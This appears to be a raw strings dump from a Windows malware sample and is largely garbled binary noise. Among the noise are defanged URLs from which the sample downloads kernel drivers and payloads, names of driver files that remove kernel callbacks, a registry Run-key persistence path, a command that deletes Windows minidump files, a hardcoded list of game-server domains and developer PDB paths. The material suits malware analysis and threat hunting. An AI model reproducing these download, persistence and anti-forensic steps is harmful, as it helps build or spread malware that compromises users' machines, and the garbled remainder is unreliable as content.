###%%% !!!$$$..."""(((&&&

%%D4111

%!"%"(((###"""###!!!

"""...((($$$&&&'''"""

 (*3.1./1346$!%

)))$$$&&&(((%%%

,,,((( ((()))!!!

&&&'''&&&!!!

###(((   %%%"""

###---***!!!

''',,,"""

222^^^%%%

%%%!!!###%%%$$$

""")))&&& ###

   """ $$$)))%%%((()))!!!

!!!$$$'''###

*&'(((&&&'''%%%$$$"""

)))""" !!!&&&###

$$$%%%&&&"""

!!!'''&&&###%%%

,,,%%% ###!!!"""

###'''"""

"""'''$$$ ###

''')))***,,,)))!!!&&&

$&&&%'&$$'''

%%f6   ***$$$!!!###!!!

#"&'&((&&!&%'%%,**###"""###!!!

! # "#!!!

$),)""" $$$!!!

"""'''&&&

%%%..."""

FFF???)))<<<;;;...EEEKKK999TTT```,,,

(((...CCCmmmdddddd222

'''(((''''&(!$!!"

###$$$"""

~~~```@@@

'''666''')))

000@@@~~~

)))***"""

'''.00,**)))%##

. )022230...'))

-&  ""!#

"'()(%!"$

###'''(((###

$$$%%%'''%%% ###(((***$$$ )))...!!!

$$$(((&&&)))---   ((($$$ &&&###

&&&***(((,,,   ,,,)))%%%""" $$$

*=@%CO

!'#$&&&$&&'''$$$'''"""

***55589=866

" !#%&"(((###"""###!!!

"""!!!%%%'''

'&(((('''&&&%%%###"""

!!!###%%%'''(((&&&$$$!!!$$$)))&&&###%%%'''###"""$$$!!!

%##%&#(((#%%&'$

$&&%$&(%#"($   ###"""###!!!

" () """ $$$!!!

'&()(%&')%%%%"$

---   ***___

888!!!888%%%...PPP

999'''555>>>

111"""===%%%

999///,,,

(((666((()))

'''000   )))$$$

---000222...)))

...qqq???

###((("""

!!!111!!!

!!!###%%%'''&&&

...;;;|||

"""''',,,"""

""")))***!!!

$$$%%%'''&&& ###)))***$$$ )))...!!!

$$$'''&&&)))---,,,((($$$ %%%###

!!!%%%!!!

$$$***,,,((($$$   &&&

$$$'''%%%### %%%$$$

&&&   '''!!! )))&&&

&&&!!!$$$

###&&&%%%

%%%(((***$$$"""&&&!!!

'''...111 ###

###%%% !!!$$$..."""((('''

%%33111

(((555;;;777

!!!###&&&)))&&&"""%%%'''   ,,,''',,,)))((('''###

"""...(((###&&&'''"""

!!!%%%   ((($$$ ###$$$%%%!!!

###''',,,%%%"""

###---)))!!!

''',,,!!!

%%% $$$%%%$$$

""")))''' $$$

"""'''###!!!$$$(((###

   """ %%%)))%%%((()))!!!

"""$$$(((###

&&&((('''&&&%%%###"""

###&&&(((,,,   ***)))&&&

!!!###%%%'''(((&&&$$$!!!$$$)))&&&$$$%%%'''###"""$$$!!!

)))""" """&&&###

!!!$$$###

'''&&&###%%%

!!!&&&(((&&&"""!!!

''')))***,,,(((!!!&&&

$$$%%%(((%%%&&&

%%%&&&%%%""",,,###"""###"""

!!!""" """(((""" $$$!!!

%%%---!!!

GGG@@@)))<<<;;;...FFFKKK999SSS___,,,

&&&"""'''&&&###

(((...CCCmmmdddccc222

'''&&&'''$$$"""

###%%%"""

-2!16 27!6:%7<(7?%<D&@G'CJ)EL,HO/KR/LS1NU2MW3NX3NX4PW7SY7SZ7R\6Q[6SZ5RY6RY8T[2NU4PW4PW4QX4PW5QX3OV4PW4PW4PW5QX4PW4PW7SZ8T[6RX8TZ7SY8TZ7SY6RY5QX4PW5QX3PW4PW3PV5QW3PW4PW4PW4PW3OV4PW7SY7SZ7SZ7SZ7SZ7SZ5RY7SZ3PV3OU4OY4PW4PW6PW4PW3OY3NX6PW5QX4OY5PZ5PZ4PW4PW4PW7SZ9SY7SY6RX7SY7SY8RX8T[.JT3NZ7QW7SY,LR

(.Vju

/4!08%4<%7<$9=%<C&@F)CI)EK,HO-JQ.JT1MW2OV2OV2OV3PW7SZ7SZ6RY6RY7T[6SZ6RY8T[3OV4PW4PW4PW3PW5QX3OV4PW3PW3PW3OV4PW4PV7SY7SY8TZ8TZ6RX8TZ8TZ7S]3OY4PW4PW3OV2OV4QX0PV3OV4PW3OV4PW5QX3OV7SZ7SZ8RY8RY6RY7SZ7T[7SZ5QX4PW4PW4PW6RY3OV4PW5QX2NU4QX4PV3OU4PW6PW6RY5QX5QX7SZ8TZ9U[6RY7SZ:T[7SZ7SZ/KR5PZ5OV8RY.KQ

]{~.JQ"<BY{

,1 05#38$49%7<'9>%<D(?G)CI EK,HO.JQ0LS2NU3OV3OV3OV4QW6RX7SZ7SZ7SZ8T[7SZ6RY7SZ5QX5QX4PW4PW4QX2OV4QX3PW4QW4QW3PV4QW6RY6RY7SZ7SZ6RY8T[7SZ7SZ7R\4OY3OY4QX2OV2OV3PW3PW4PV5QX4PW4PW4PW4PV5QW8TZ7R\6Q[7SZ8T[6SZ6SZ4PZ3OY4PW3OV7QX6PW5OV6PW3OV5QX3PV3PV3OU4PV4PV3OU4PV7SY6SZ7SZ7SZ7T[6SZ9U\5QX1MT3PW3PW6RX/HX

/// ???...XXX

"""###"""###"""!!!

~~~___^^^"""

......---...------...---...///......---......---...------...//////---...///...000EEECCCDDDCCC///111///333//////333555GGGHHHGGGGGG......111000///666<<<444000111000//////000...///...999FFFFFF@@@999333,,,111......---***...444;;;<<<>>>888,,,---...000000...,,,///,,,666MMMMMMLLLDDD888000111---...111---//////---///000------...LLLJJJMMMLLL---,,,...???MMMMMMKKK999,,,      ---...---/////////.........///---,,,   ------...000---      ---,,,DDD(((

((('''&&&))),,,)))(((

%%%***'''

<<<:::555444888

???<<<333555&&&

>>>@@@777888

...DDD;;;:::;;;777

...KKK@@@===@@@???!!!

...CCC

...TTTAAAAAABBBAAA!!!

...LLL

444\\\...

444,,,000---

...mmmjjjkkkllllllmmmnnnmmmlllllljjjmmmooommmkkkmmmkkkooolllnnnmmmlllccceeeeeebbb'''lllccc

$$$%%%###%%%###

)1.JQ

 0 .3"14"36#5:$8?$9=#=D&@G'BL)DN,HO-IP/KR2NU2NU3OV3OV5QX5QX7SZ6R\6R\7SY7SY7SZ7SZ5QW4PV4PW4OY4OY4OY4OY4OY4PW4PW4PV3OU3PW6SZ7T[6RY7SZ7SZ7SZ7SZ6RY5QW3OV4OY5QX3NX4NZ4OY4PZ4PW4PW3PW4PZ5QX7SY7SY7SZ7SZ7SZ7R\6SZ6RY4PW4PV4PW4PW4PW4QX3PW4QX3PV4PV4PW4PW4PW4PW4PW4PW5QX9SZ7SZ8TZ8TZ7SY7SY8T[6Q[/JT3PW1QV7Q].KQ

-IZ.J[.KZ0JZ'>T

.1!25"27!38&8=%:>&=E%?F EL)DN-HR-HR0JV1KW1NT3OU3OU4PV6SV6SV6RX:TZ7T[6SZ5QX8T[2NU6RY4PW4PW4OY5PZ2LX5O[5O[3MY5O[4NZ5QW6RX7SY8TZ6RX7SY6RX7SY7R\6Q[4OY1NU4PZ4PZ4PZ5QX4PW5QX4PW5QX4PW4PW8TZ7SY7SY7SZ7SZ7SY6RX6RX4PW4PW4PW3OV6PW6PW4PW4PW2NT5QW3PW3PW4OY5PZ3NX3MY5PZ6Q[8TZ6RX7SY8TZ8U[7SY7SY.JQ3QT2NX9TW.IS

,/!/4"14"36%5:&8=$9=#=D&@G'BL)DN,HO.JQ/KR1MT2NU3OV3OV5QX4QX7SZ6R\6R\7SY7SY7SZ7SY5QW4PV4PW3OY4OY3NX3NX4OY4PW4PV4PV3OV4PW6RY7SZ6RY7SZ7SZ7SZ6RY6RY5QX4PW4NZ4QX4OY3OY3PW5RY4PW3PW3OY3PW4PW7SY7SZ7SZ7SZ7SZ7SZ7SZ6RY4PV4PV4PV4PW4PV2OV3PW3PV3PW4PV4PW3PW3PW3PW4PW4PW5QX7SZ7SZ8TZ8TZ7SY7SY8T[6Q[/JT3PW1QV7Q].KQ

&CR(CW'AQ DT*BT.EU)GS*DQ*CS'@R*DQ

.Xu1GY.KZ.I]

.GY1GY-IZ*IX&?O

$$$&&&###"""$$$

...###@@@...YYY

***,,,000

///...

!!!111000555444\\\

###222777

)))444666999444

999777;;;888

666555!!!

666...888;;;[[[

888:::===???

666222;;;???^^^

Ýdlllnnnlllkkklllmmmlllmmmmmmkkkkkklllmmmmmmmmmnnnnnnkkknnnmmmkkkmmmuuu

}}}___```

$$$%%%$$$%%%$$$

\\\hhhppp111''' *** ===...ZZZ

}}}---,,,

(7),01444

'9=82<.342

9T.mn,

%fkk4

{`.cF

-.VU2

1975/08/21

, #&')*)

-0-(0%()(

.In4i.o-

1900/01/01

2007:02:07 02:59:30

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

iphlpapi.dll

MPR.dll

VERSION.dll

.PAVCException@@

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

\\.\Scsi0:

\\.\PhysicalDrive0

%s:%d

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

(*.htm;*.html)|*.htm;*.html

its:%s::%s

x86 Family %s Model %s Stepping %s

X-X-X-X

.PAVCOleException@@

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCOleDispatchException@@

.PAVCArchiveException@@

c:\%original file name%.exe

deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly

inflate 1.2.3 Copyright 1995-2005 Mark Adler

#include "l.chs\afxres.rc" // Standard components

WinExec

RegCreateKeyA

RegCreateKeyExA

GetViewportExtEx

GetViewportOrgEx

ScaleViewportExtEx

SetViewportExtEx

OffsetViewportOrgEx

SetViewportOrgEx

GetKeyState

GetKeyboardType

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

E577??

!D457?@

!D77??

[,,,,///

,/===0/

[,,,////

$,$$,(<@

#(/<<<=@@?<<("

$//<==//

/<=?@@=/,/<?@

$,//<<==@

???86&$""

##'''####

#'.'''.'''#

#'..(((...'#

BGI30.1.0.16

<assemblyIdentity version="1.0.0.0" name=".add"/>

<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />

oledlg.dll

1.0.0.0

windowswf

@api-ms-win-core-synch-l1-2-0.dll

mscoree.dll

ext-ms-win-ntuser-windowstation-l1-1-0

portuguese-brazilian

\SYSTEM\CurrentControlSet\Services\%s

\Drivers\*.sys

1.0.0.1

_ChangePassword

(*.*)

1.1.0.0

%original file name%.exe_3424_rwx_00401000_00437000:

t%SVh

t$(SSh

|$D.tm

H%d\z

~%UVW

t.It It

u$SShe

kernel32.dll

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

oleaut32.dll

EVariantBadIndexError

u%CNu

MaxKeySize

Invalid key size

%UUUU1E

%UUUU3

5 passes)

1.2.3

DB00735E-CFFB-47E6-B060-BB0D74008B7A

94-401@163.com

ku2.iu

Kernel32.dll

Winhttp.dll

ole32.dll

ntdll.dll

shlwapi.dll

user32.dll

advapi32.dll

psapi.dll

Urlmon.dll

wininet.dll

Wininet.dll

ws2_32.dll

version.dll

ShellExecuteA

GetProcessHeap

MsgWaitForMultipleObjects

GetWindowsDirectoryA

WinHttpCheckPlatform

WinHttpCrackUrl

WinHttpOpen

WinHttpConnect

WinHttpOpenRequest

WinHttpSetTimeouts

WinHttpSetCredentials

WinHttpCloseHandle

WinHttpSetOption

WinHttpAddRequestHeaders

WinHttpSendRequest

WinHttpReceiveResponse

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpQueryHeaders

URLDownloadToFileA

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

RegOpenKeyA

RegCloseKey

DeleteUrlCacheEntry

\Data\Config.ini

2434595645!

127.0.0.1

woool.dat.update

popup.dat

Widget.dll

cliqos.dll

Game.ini

GroupNick0

ServerPort

WidgetContent.IE.dll

.rsrc

9=|

5\pUWSSHYzZ

(}9D%F

]CvL,

VQR`"%U;!

.Be$>;

g21r%Wr0/.Wr%W-, %Wr%*)r%Wr('&Wr%W%$#:v

VXX\.BKj

WudP

A.DNE

%SxI8

Uq.NL;(

.UTX@9

.IY\p,

A.tCDo

~_\.Wl

(.eC:

.WPya

`%Ua`

xs.MI!&

Zc#P%c

.kwFt

*.lrR

\.pL.

el32.dll

>6Qt%c

(()@-3$-

},z%C

l  O%cR

.PA5>C0>2

axKey7

eH.Cl

PJ.J.TXJ.J.\`K

XT.J.JPL%J.JH

hsSH>

8-%X<

;44.fB$

.fZNt

DB00735E-CFFB-47E6-60

94(01@163.

%Y]%F]

Acqui.Rf/

MICKEY

AAD.DJ

O.OPP

%d&&'

W%*.*f

2CNotSupported

96.Ae

mu_.fe,g

_DZwMsg

ELECTED4.MSVCRT

,.PAV

'5X%S

*.* G1

(&07-034/)7

.tp#3

%s:%d/=

.Eh.dE^

keyw

?n.NNn

*.yUW

Gl.chs\S

H.Jk

eg1Key

< 3)20,6

O.rsrc

KERNEL32.DLL

ADVAPI32.dll

COMCTL32.dll

comdlg32.dll

GDI32.dll

OLEAUT32.dll

SHELL32.dll

USER32.dll

WINMM.dll

WINSPOOL.DRV

WS2_32.dll

ReportClientQos

?.mF$

WLBÄ

P.RlN

u.Hs,

%c&px|

5\tUWSSHh

&FtPoq0Hv

#X>.Ptm|t

${E.PH

,H.QB

.Jw'j\Q

0.2A.DNE

"nÎ

!KÀ

~*K.HF

A.tCDH

`@;8x%x

c4 &.ITf

C.kwFt

t]&%uAK

NO.OPK

'&%$$#""!!

W%*.*

gCNotSupported

Resourl

CmdTarf

ECTED4.MSVCRT

B.XPgo

X%Sm'

.*.*o

tH%s<

%s:%d/u%

h.dE7

r.nJg1~_

zcÁ

.r%.hXA

QKey9

.uK97

\ `.ra]

*.exe

hXXp://count25.51yes.com/sa.htm?id=258097168&refe=&location=http://VVV.hqkjwy.com:88/dlqtj.html&color=24x&resolution=1440x900&returning=0&language=undefined&ua=Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36

http=

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Content-Type: application/x-www-form-urlencoded

Adodb.Stream

wshom.ocx

WindowStyle

Hotkey

hXXp://moling.bianqian8228.com:789/

.zunbaoyishu.com/

hXXp://

20170101

\data\woool.dat.update

.SESj

6]%X[tl}T

k\<Ts<\%SHK

_&NI%Xh0U

f%u9]

%DjLhV

\UWSSHh

 "UDp

(.ni0

\k-.dE

>.Ptm|tc

.QTC!

PBi@.HD

%C$$$

[.LUr

D(.YPW

%X@!L

l(%U4:

jF RSSh6

%CIt#

Çc$

}%U4s

A.tCD

9 .pk

xlÕ7

x S%u' J

.PSad

^}%.x2

h.ly&

.hd\R

6.uL/

SFC.kwFt

x%xD?

<#,user32.dll

6ACC.DLLT

[lzndowPr8AkF.eg

hXXp://w

.hqkjwy.c

C:\WIN

102.54.9

38.25.63.10xyp

/.- *)(''&%$$#""!!

%*.*f

.Arm.

*OCmdT"

..HLP

SVCRTgr

X`hB.trp

.PAVC@@)I

%s:%d)

RIFF%x

1.6.7

.Ehho

!Gl.chs\S-

cKey

UrlA3%

}.mKK;

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PAD

RASAPI32.dll

WININET.dll

.text

`.rdata

@.data

@.reloc

j.Yf;

_tcPVj@

.PjRW

not supported

operation canceled

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

address family not supported

broken pipe

function not supported

inappropriate io control operation

InitOnceExecuteOnce

operator

operator ""

operator co_await

?#%X.y

%S#[k

?\\.\SafeWall

/c del /f /s /q c:\windows\minidump\*.*

C:\Windows\MEMORY.DMP

cmd.exe

C:\Windows\Temp\1.sys.rar

C:\Windows\Temp\1.key.rar

%s\SafeWall.sys

hXXp://x6.tianyuanfalan.com/SafeWall.rar

C:\Windows\System32\SafeWall.sys

%s\Drivers\SafeWall.sys

hXXp://x6.tianyuanfalan.com/SafeWall64.rar

C:\Windows\SysWOW64\drivers\SafeWall.sys

hXXp://x6.tianyuanfalan.com/sys.rar

%s\Temp\sys.dat

%s\Temp\sys.key

%s\Temp\sys64.dat

%s\Temp\sys64.key

%s\Drivers\UnlockCallback_x64.sys

C:\Windows\SysWOW64\drivers\UnlockCallback_x64.sys

%s\Drivers\UnlockCallback.sys

C:\Windows\System32\drivers\UnlockCallback.sys

\*.dat

\temp\Config.dat

hXXp://x6.tianyuanfalan.com/Config.rar

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

windowsw

c:\Windows\Flags

C:\Users\dumingqiao\Desktop\Phoenixer\Release\Phoenixer.pdb

.text$di

.text$mn

.text$x

.text$yd

.idata$5

.CRT$XCA

.CRT$XCAA

.CRT$XCC

.CRT$XCL

.CRT$XCU

.CRT$XCZ

.CRT$XIA

.CRT$XIAA

.CRT$XIAC

.CRT$XIC

.CRT$XIZ

.CRT$XLA

.CRT$XLZ

.CRT$XPA

.CRT$XPX

.CRT$XPXA

.CRT$XPZ

.CRT$XTA

.CRT$XTZ

.rdata

.rdata$T

.rdata$r

.rdata$sxdata

.rdata$zzzdbg

.rtc$IAA

.rtc$IZZ

.rtc$TAA

.rtc$TZZ

.xdata$x

.idata$2

.idata$3

.idata$4

.idata$6

.data

.data$r

.tls$

.tls$ZZZ

.rsrc$01

.rsrc$02

KERNEL32.dll

ExitWindowsEx

RegOpenKeyExA

RegDeleteKeyA

urlmon.dll

CertGetNameStringA

CryptMsgGetParam

CertFindCertificateInStore

CertFreeCertificateContext

CertCloseStore

CryptMsgClose

CRYPT32.dll

SHDeleteKeyW

SHLWAPI.dll

imagehlp.dll

PSAPI.DLL

GetCPInfo

.?AU_Crt_new_delete@std@@

h.rdata

H.data

.reloc

c:\users\dumingqiao\desktop\source\objfre_win7_x86\i386\EnumRemoveCmpCallback.pdb

ntoskrnl.exe

7%7U7

.pdata

c:\users\dumingqiao\desktop\source\objfre_win7_amd64\amd64\EnumRemoveCallback.pdb

2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,

/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D

hXXps://VVV.verisign.com/rpa0

hXXp://ocsp.verisign.com0;

/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0

<VeriSign Class 3 Public Primary Certification Authority - G50

DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0

hXXps://VVV.verisign.com/cps0*

#hXXp://logo.verisign.com/vslogo.gif04

#hXXp://crl.verisign.com/pca3-g5.crl04

hXXp://ocsp.verisign.com0

pk.x6cs.com

hXXp://pk.x6cs.com:88/

ECInf->Key%x

Hash%x

ECInf->FileBufferLen%d

sf999.com

fhdlq.com

28pk.com

ggwoool.com

wooolsf.com

5b.com

125.88.181.

183.60.200.

45woool.com

44woool.com

zhaowoool.com

zhaocs.com

huocs.com

fireol.com

8cs.com

jielesh.com

woool2017.com

600sf.com

xlcomic.com

021sjjc.com

45ci.com

bdtiandao.com

lke5.com

45woool.org

zjlscnc.com

guanmei2008.com

dtggc.com

93u.com

woool2sf.com

chinahuaman.com

176fgcqsf.com

shaibar.com

ucwoool.com

65535cs.com

quwoool.com

88woool.com

HTTP/1.1 301 Found

Location: %s

c:\users\dumingqiao\desktop\projects\safewall\safewall_x86\objfre_win7_x86\i386\SafeWall.pdb

KeDelayExecutionThread

ZwDeleteKey

ZwOpenKey

KeStallExecutionProcessor

HAL.dll

Hash %x

ECInf->Key %x

ECInf->BB %x

in line:%d

c:\users\dumingqiao\desktop\projects\safewall\safewall_amd64\fucksys.c

at file:%s

c:\users\dumingqiao\desktop\projects\safewall\safewall_amd64\objfre_win7_amd64\amd64\SafeWall64.pdb

<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />

0/070@0_0

9 :0:4:8:<:

8 8$8(8,8

=/>4>;>_>

4 4$4(4,4

;0<@<\<`<|<

Software\chuanshi\web

\Data\config\ItemCfg.INI

\Data\config\default\bestitem.INI

https

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

HTTP/1.1

hXXps://

hXXp://VVV.hqkjwy.com:88/h.txt

vreport

windows

Battle.net

$Recycle.Bin

data\woool.dat.update

Software\Microsoft\Windows\ShellNoRoam\MUICache

\0-49-3d.nmp

dWEbo

úG0

n#e.jzPxt

.Dt[:js

U#y.aPKwH

]4O%UMp&

2cpÞ

g^.Lt

=.Rx>/

V=.ev&2

.WKM\-

t%DkT

.rO@]

V.rP?

CE.rC

.NaEb

.qPzM

.oKty[

M.nN-H

fB%s:

Q~(%c

8.Ww4

P.Dy4

" .eXqit

Yh2%Ud

S.jLu

V\jiangjunling01.nmp

\jiangjunling02.nmp

Oi%xK_<

^t%dk

-d}Gt

3s4%U

\wuxing.nmp

%sBdN

%sJdN

:1975/08/21

Http://

VBScript.RegExp

Adobe Photoshop CS2 Windows

2011:12:22 11:54:23

urlTEXT

MsgeTEXT

hXXp://ns.adobe.com/xap/1.0/

<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="3.1.1-111">

<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">

xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">

xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/">

xmlns:xap="hXXp://ns.adobe.com/xap/1.0/">

<xap:CreatorTool>Adobe Photoshop CS2 Windows</xap:CreatorTool>

xmlns:xapMM="hXXp://ns.adobe.com/xap/1.0/mm/"

xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#">

<stRef:documentID>adobe:docid:photoshop:4de4def4-ecd0-11e0-9a10-a9350357c235</stRef:documentID>

xmlns:dc="hXXp://purl.org/dc/elements/1.1/">

xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/">

IEC hXXp://VVV.iec.ch

.IEC 61966-2.1 Default RGB colour space - sRGB

CRT curv

.fM,k

.kp:S

?idWF.fE

-0 /2#25"27$6;#7>"7?#=C$@F&CJ*FM-IP0JQ/KQ1MS1NT4PW3OV4PW6RY7SZ8T[6Q[7SZ8TZ7SZ7SZ5QW4QT5QW4OY3PW4QX3PW3PW3PW3PW4QX4PW4PV7SY7SZ6RY7SZ7SZ6RY7SZ8SV4PV3PW2OV4PW5QX4PW3OV3PW4PW3OV5PZ2OV4PW6RX6SZ9SY7SZ7SZ8T[6SY8TZ4PV4PV4PW4PZ4PZ3OY3OY3PW3OY5PZ4NZ5PZ4OY4OY5PZ4OY5QX7SZ:UX7SY7SZ7SZ7SY7SZ6RY-IS4RU4OY:TZ.JT

 .Zv|Qkw

-2#16"27$49"6=$9@$>D&@F(DK)EL,HO-IP0KU2MW3OV3OV3OV5QX6RX7SY7SY7SZ8S]7SZ7SY8TZ3OU5QX4PV4PV1QV0PU3PV4QW2OV3PW1NU4QX3OV7SZ5QX7SZ7SZ6RY8T[6RY7SY3OU5QW4PW4PV5QW5RX3PV4PW6RY3OV5QX4PW3OV7SZ7SZ8T[5QW8U[8TZ5RX6SY4QW3PW3PW5QX3OV5QX4PW5QX5QW4PV3QT3PV3PV3PW5QX3OV5QX6RY7SY7SZ7SZ7SZ8T[9U\8RY0JQ6N[.PV9R\-HT

-2!16"27$49"6=%9@$>E$@G(DK)DN*FP-IS/JT3NX4PW3OV3OV4PW6RY7SZ7SZ7SZ8T[7SY5RX8TZ3OU5QW4PW4PV0PV/OT4QW4QW1NU5RY1NU4QX4PW7SZ6RY6RY7SZ6RY8T[7SZ8T[2NU5QX3OV4PV5QW4RU2PS4PW6RY3OV5QX4PW3OV7SZ7SZ8T[5QW8U[8TZ5RX6SY4QW3PW3PW5QX3OV5QX4PW5QX5QW4PV3PV3PV3PV3PW4PW5QX5QX6RY7SY7SZ7SZ7SZ8T[9U\8RY0JQ6N[.PV9R\-HT

###$$$"""$$$&&&

!!! !!! """ """###!!!

|||___^^^"""

...---,,,---   ,,,,,,,,,......---...,,,---...---///...111...000222000///...000HHHJJJEEEDDD444,,,   111.........111000>>>EEEEEE???444......111   ///???EEEGGGEEE555000000.........111111000---///BBBFFFCCCEEE555000   ,,,,,,...444<<<BBBGGGAAA...------...---///111...---EEEKKKMMMOOO888/////////---   ///000...111   000///***///---,,,///,,,...KKKKKKMMMCCC???333   ***---,,,,,,------...///..................---------//////------///***,,,,,,FFF&&&

???<<<222444555666

777666333777

@@@<<<333888666555

999???@@@???>>>@@@

%%%XXXXXXXXXLLL

...RRR]]]^^^\\\\\\___^^^JJJ

999888666444

888999000

!!!999;;;===:::)))

...vvv

[[[(((&&&|||

]]]___"""

###$$$%%%$$$%%%

 / /2"14"36i&8=$8@%<D'@J'BL)DN,HO.JQ/KR1MT1MW2OV2OV3PW7SZ7SZ7SZ6RY7SY7SY7SY7SY4PW5QX4PW4PW4PW4PW4PW4PW4PW5QX4PW4PW5PZ7R\9SZ9SY9SY9SY7SY7SZ9SY4PW3OY5RY4PW3OV4OY4PZ4OY6PW4PW4PW5QX4PV6RX7SY7SY7SY7SZ7SZ7SZ7SZ4PW5QX4PW5QW4PV4PV5QX3PW4PW7QX4OY5PZ4OY5PZ4PW4PW4PW6RY9SY7SZ7SZ6RY9SY:T[6RY/KU3PW4PZ9SY/KR

05!38#5:%7<&8=%<D&@G*DK*FM,HO.JQ0KU1LV2NU3OV3OV4PW7SY7SY7SY7SZ:T[9SZ6RY8T[3PW5QX4PW4PW5QX4PW4PW4PW4PW4PW4PW4PW5QX7SZ7SZ7SZ7SZ7SZ7SZ7SZ5T]4PZ4OY6OY4OY4OY3PW1QW3NZ3NZ3NZ3NZ3NZ3NZ6Q]7R^9SZ7QX9R\:T[6RY7SZ3NX4OY3OV4PW4PW4PW4PW5QX4PW3PV3PW4QX3OY4OY4OY3NX4PW7SZ9U[6RY7SZ8T[8T[6RY8T[.JQ4QW4PW9TW/JT

)0.JQ 7?Dbm

}}}|||~~~

,,,!!!???...XXX

   ...rrr

......,,,---,,,---------...000......---///...---/////////////////////000...DDDFFFFFFGGG---IIICCCBBB>>>777444...//////000111///222,,,///000......///000555///000000HHHIII<<<000.../////////000...///000   :::FFF777   ,,,......666<<<BBBIII===///------...   ///---...---EEEKKKMMMMMM666000///...---...///111///...---222......,,,,,,000000------JJJKKKNNNFFFAAA111---))),,,,,,...---......///.........///...---,,,,,,---...111,,,,,,000   ,,,,,,EEE&&&

>>>===444555444666

SSSHHH"""

---444333555444

>>>999444666555444

...555:::444666:::

000:::888999:::888<<<888

???@@@===///

...NNN;;;;;;<<<<<<<<<<<<<<<<<<<<<======<<<:::===<<<===>>>===???===>>>===999<<<<<<EEE'''

...SSSGGG))) !!!

...lll!!!

;;;777000

:::999888999

...jjjlllnnnkkklllkkklllnnnjjjnnnkkklllmmmnnnjjj

###%%%###$$$%%%

|||{{{|||}}}~~~|||~~~

!!!###***

@@@```~~~

999(((555>>>

111""">>>$$$

888///,,,

111...///

;;;---111

(((444((()))

EEE444111111...LLL

333   ---   ...OOO

"""'))***$$$

$$$***)))555999)))%%%

222:::888555666[[[

%''(%'$#%

$'#(&&%&(

!!!###$$$(((&&&

"""'''((("""

"""'''   """

$$$%%%'''%%% ###(((***$$$ )))...!!!

!!!888...;;;

!!!&&&!!!

&&&   (((,,,   ,,,)))%%%""" $$$

"""&&&$$$###$$$'''&&&!!!

$$$   ,,,((($$$   &&&

!!!'''"""

$$$'''&&&### %%%$$$

"""'''***'''&&&   $$$

###&&&%%% %%%(((***$$$!!!%%%

'''...111 ###

&&& &"*(('''$$$'''"""

$$$###"""%%%)))'''###)))111555444333

###%%% !!!$$$..."""(((&&&

%%D4111

%!"%"(((###"""###!!!

"""...((($$$&&&'''"""

 (*3.1./1346$!%

)))$$$&&&(((%%%

,,,((( ((()))!!!

&&&'''&&&!!!

###(((   %%%"""

###---***!!!

''',,,"""

222^^^%%%

%%%!!!###%%%$$$

""")))&&& ###

   """ $$$)))%%%((()))!!!

!!!$$$'''###

*&'(((&&&'''%%%$$$"""

)))""" !!!&&&###

$$$%%%&&&"""
